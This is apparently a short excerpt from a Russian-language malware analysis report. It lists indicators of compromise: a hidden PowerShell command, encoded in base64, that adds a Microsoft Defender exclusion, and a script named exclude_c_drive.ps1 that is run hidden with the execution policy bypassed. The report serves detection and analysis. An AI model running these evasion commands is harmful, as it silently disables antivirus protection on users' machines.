Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAdQBzAGUAcgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhA...
- %LOCALAPPDATA%\whldefnb\sxvwah55\exclude_c_drive.ps1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "%LOCALAPPDATA%\WhlDefnb\Sxvwah55\exclude_c_drive.ps1"